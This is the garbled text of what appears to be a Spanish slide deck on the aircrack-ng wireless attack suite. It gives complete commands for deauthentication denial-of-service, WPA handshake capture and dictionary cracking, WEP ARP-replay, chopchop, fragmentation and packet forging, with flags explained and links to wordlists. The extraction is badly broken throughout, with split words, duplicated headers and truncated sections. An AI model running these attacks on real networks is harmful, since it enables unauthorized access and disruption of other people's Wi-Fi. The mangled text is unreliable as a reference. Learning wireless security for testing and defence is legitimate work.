de ataque:
t
AIREPLAY: deautenticacin
AIREPLAY: deautenticacin
aireplay ng -0
aireplay-ng
0 1 -a
a 00:14:6C:7E:40:80 -c
c 00:0F:B5:34:30:30 ath0
-0 significa deautenticacin
1 es el nmero de deautenticaciones a enviar donde 0 significa enviarlas
continuamente
-a 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso
-c 00:0F:B5:34:30:30 es la direccin MAC del cliente a deautenticar;; si
se omite sern deautenticados todos los clientes
ath0 es el nombre de la interface
Deautenticacin: DoS
Cada vez que un cliente se conecta a una red con cifrado WPA,
enva
un paquete-saludo,
t
l d oH
Handshake
d h k all AP all que se va a
conectar. Este saludo contiene la contrasea encriptada.
Para capturarlo, trataremos de desconectar al cliente y estar a
l escucha
la
h para capturar
t
ese H
Handshake.
d h k M
Mas ttarde,
d
intentaramos crackear ese Handshake para obtener la
contrasea.
airmon-ng
i
start ath0
h0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0
(abrimos otra consola)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D
ath0 (esperamos algunos segundos)
aircrack-ng -w /path/to/dictionary out.cap
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
p
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
un D
DoS
S en una
consola a parte y esperaramos a que se generase la primera
peticin ARP. Una vez se hubiese generado la primera, iramos
a la consola q
que
e est reali
realizando
ando el ataq
ataque
e DoS y p
pulsaramos
lsaramos
Ctrl+C para pararlo.
Ahora iramos a la consola que est realizando el ataque 3 y
veramos
como las
l peticiones
ti i
ARP estn
t subiendo.
bi d
La sintaxis es la siguiente:
Para que este ataque funcione hay que tener activo el airodump-ng, ya
que es el encargado de la captura de paquetes y para que este ataque
se inicie necesitaremos un Beacon.
Algunos
g
p
puntos de acceso ignorarn
g
direcciones MAC invlidas. Por lo
tanto asegrate de usar una direccin de un fabricante wireless vlido
cuando decidas cambiar la MAC. En otro caso los paquetes sern
ignorados.
Uno de los modos de usar este ataque es haciendo una difusin de los
paquetes del AP y as generar nuevos vectores de inicializacin.
Para hacer esto p
posible,, necesitaramos una direccin MAC especial,
p
,
una que englobara a todas las MAC's. Esta mac es la
FF:FF:FF:FF:FF:FF
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80
h 00:0F:B5:88:AC:82 ath0
-2 significa ataque de inyeccin interactivo
-p 0841 fija el Frame Control en el paquete para que parezca que est
siendo
i d enviado
i d d
desde
d un cliente
li t wireless.
i l
-c FF:FF:FF:FF:FF:FF fija como direccin MAC de destino cualquiera
(broadcast). Esto es necesario para que el AP responda con otro
paquete
p
q
y as g
generar un nuevo IV.
-b 00:14:6C:7E:40:80 es la direccin MAC del punto de acceso
(BSSID).
-h 00:0F:B5:88:AC:82 es la direccin MAC de los paquetes que se
estn transmitiendo
transmitiendo, que debe coincidir con la MAC de tu tarjeta
wireless.
Los IVs g
generados por segundo
g
variarn dependiendo del tamao del
paquete que seleccionemos. Cuanto ms pequeo sea el tamao del
paquete, mayor ser la velocidad por segundo. Cuando lancemos el
programa, veremos algo como esto:
Una vez q
que inicias el comando vers algo
g como:
-3
-b
-h
asociada.
i d
Puede que tengas que esperar un par de minutos, o incluso ms, hasta
que aparezca una peticin ARP; este ataque fallar si no hay trfico.
Introduce este comando:
aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0
0000
0001
0010
0011
0100
0101
0110
0111
1000
0
1
2
3
4
5
6
7
8
Desencriptamos un paquetes
aireplay-ng
i l
-4
4 ath0
th0
Esto puede que no funcione, ya que en muchos casos los puntos de
acceso no aceptan los paquetes de datos porque no saben que MAC
se los est enviando
enviando. En este caso tenemos que usar la direccin MAC
de un cliente conectado que si va a tener permiso para enviar paquetes
de datos dentro de la red
aireplay-ng
p y g -4 -h 00:09:5B:EB:C5:2B ath0
Vamos a echar un vistazo a la direccin IP
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading
g from file replay
p y_dec-0627-022301.cap,
p, link-type
yp [[...]]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
AIREPLAY: FRAGMENTACIN
Con este ataque, cuando tiene xito, podemos obtener 1500 bits de un
PRGA (pseudo random generation algorithm). El PRGA es una parte de
un paquete que est formada por texto plano y texto cifrado
cifrado.
Este ataque no recupera la clave WEP por si mismo, simplemente sirve
para conseguir el PRGA. Despus podemos usar el PRGA para generar
paquetes con packetforge
packetforge-ng
ng.
Se requiere al menos un paquete de datos recibido del punto de acceso
para poder iniciar el ataque.
Bsicamente,, el programa
p g
obtiene una p
pequea
q
cantidad de informacin
sobre la clave de un paquete e intenta enviar un ARP y/o paquetes LLC
al punto de acceso (AP).
Si el paquete es recibido y contestado por el AP de forma satisfactoria,
entonces se podr obtener un poco ms de informacin sobre la clave
de ese nuevo paquete enviado por el AP. Este ciclo se repite varias
veces hasta que obtenemos los 1500 bits del PRGA o algunas veces se
obtienen menos de 1500 bits
bits.
FRAGMENTACIN
-b bssid :
-d
d dmac
d
:
-s smac :
-m len :
-n
n len :
FRAGMENTACIN
FRAGMENTACIN
FRAGMENTACIN
FRAGMENTACIN
AIRDECAP
AIRDECAP: ejemplos
PACKETFORGE
PACKETFORGE
PACKETFORGE
Opciones de origen:
-r <archivo> : leer paquete de este archivo
-y <archivo> : leer PRGA de este archivo
Modos:
PACKETFORGE
Hay que obtener un archivo xor (PRGA) con el ataque chop chop o con
el ataque de fragmentacin.
Despus usar un comando como el siguiente:
packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D
-k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor
-w arp-requestt
-0
-a
-h
h
-k
-l
-y
-w
PACKETFORGE
PACKETFORGE
PACKETFORGE
AIRTUN
AIRTUN
AIRTUN: WIDS
AIRTUN: WIDS
AIRTUN: doble AP
AIRTUN: doble AP
AIRTUN
Ventajas:
Inconvenientes:
Ventajas
Puede funcionar en algunos casos en los que no lo hace el
ataque de fragmentacin.
No se necesita conocer informacin acerca de ninguna IP.
Inconvenientes
No se puede usar contra todos los puntos de acceso.
El tamao mximo del xor en bits est limitado por la
longitud del paquete contra el que hagas el chopchop
chopchop. Aunque
en teora se pueden obtener 1500 bytes del xor stream, en la
prctica, raramente vers paquetes de 1500 bytes.
Mucho ms lento que el ataque de fragmentacin.
ATAQUE 4
Ataque de Korek
E t ataque
Este
t
no nos proporciona
i
IV sino
IVs
i que nos d
da la
l
posibilidad de descifrar el contenido de un paquete (o lo
que es lo mismo, el Key Stream de cifrado).
No todos los puntos de acceso son vulnerables a este
ataque ya que este ataque necesita paquetes ms cortos
de 42 bytes y algunos AP rechazan paquetes menores a
60 bytes.
ATAQUE 5
Ataque de fragmentacin
Este ataque no proporciona la clave WEP, sino que nos
proporciona 1500 bytes de los cuales podemos extraer la
funcin de PRGA ((Pseud-Random Generation Algorithm),
g
),
y por tanto parte del Key Stream de cifrado.
Estos bytes nos servirn para generar paquetes vlidos
que pueden ser reinyectados para obtener IV
IVss.
ANEXOS: airodump
ANEXOS: airodump
ANEXOS: aireplay
Ataque
Ataque 0: Deautenticacin
Ataque 1: Falsa autenticacin
Ataque 2: Seleccin interactiva del paquete a enviar
Ataque 3: Reinyeccin de una peticin ARP (ARP-request)
Ataque 4: Ataque chopchop
Ataque 5: Ataque de Fragmentacin
ANEXOS: aireplay
Opciones de filtro:
-b bssid : Direccin MAC del p
punto de acceso
-d dmac : Direccin MAC de destino
-s smac : Direccin MAC origen (source)
-m len : Longitud
g
mnima del p
paquete
q
-n len : Longitud mxima del paquete
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
ANEXOS: aireplay
Opciones de inyecin:
-xx nbpps : nmero de paquetes por segundo
-p fctrl : fijar palabra frame control (hexadecimal)
-a bssid : fijar direccin MAC del AP
-c dmac : fijar direccin MAC de destino
-h
h smac : fij
fijar di
direccin
i MAC origen
i
-e essid : ataque de falsa autenticacin: nombre del AP
-j : ataque arp-replay: inyectar paquetes FromDS
-g
g valor : cambiar tamao de buffer (default: 8)
-k IP : fijar IP de destino en fragmentos
-l IP : fijar IP de origen en fragmentos
-o npckts : nmero de paquetes por burst (-1)
-q sec : segundos
d entre
t paquetes
t sigo
i aqu
o keep-alives
k
li
((-1)
1)
-y prga : keystream para autenticacin compartida (shared key)
ANEXOS: aireplay
Opciones de origen:
-ii iface : capturar paquetes con esa interface
-r archivo : utilizar paquetes de ese archivo cap
Modos de ataque:
--deauth [nmero]: deautenticar 1 o todos los clientes (-0)
--fakeauth
fakeauth [n
[n repeticin]: falsa autenticacin con el AP (-1)
( 1)
--interactive : seleccin interactiva del paquete a enviar (-2)
--arpreplay : estandard reinyeccin ARP-request (-3)
--chopchop
chopchop : desencriptar paquete WEP/chopchop (-4)
( 4)
--fragment : generar keystream vlido (-5)
ANEXOS: aircrack